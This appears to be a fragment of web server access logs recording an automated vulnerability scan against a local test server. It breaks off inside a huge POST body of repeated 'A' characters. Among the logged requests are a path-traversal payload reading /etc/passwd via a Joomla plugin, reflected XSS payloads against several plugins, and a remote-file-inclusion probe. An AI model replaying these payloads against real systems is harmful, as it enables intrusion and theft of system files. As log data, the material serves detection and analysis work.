+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/help/support HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/eatery/nav.php?-Menu-=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.zul HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xxl-job-admin/toLogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationendpoint/29k6bzcbunkpdd9v6ihoqhjwuou.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.jenkins.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"[\x22127.0.0.1:443/ui/\x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /casa/nodes/thumbprints HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA